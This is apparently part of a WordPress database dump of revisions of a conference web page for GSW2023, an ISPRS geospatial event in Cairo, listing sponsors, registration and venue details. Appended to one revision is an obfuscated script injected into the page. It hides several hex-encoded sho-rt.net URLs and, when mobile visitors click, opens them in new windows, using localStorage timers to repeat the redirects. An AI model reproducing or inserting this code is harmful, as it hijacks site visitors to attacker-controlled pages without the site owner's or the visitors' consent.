src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"]\r\n\r\n&nbsp;\r\n\r\n[vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 05:49:54','2023-05-17 05:49:54','',3066,'https://gsw2023.com/?p=4535',0,'revision','',0),
(4536,1,'2023-05-17 05:52:28','2023-05-17 05:52:28','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 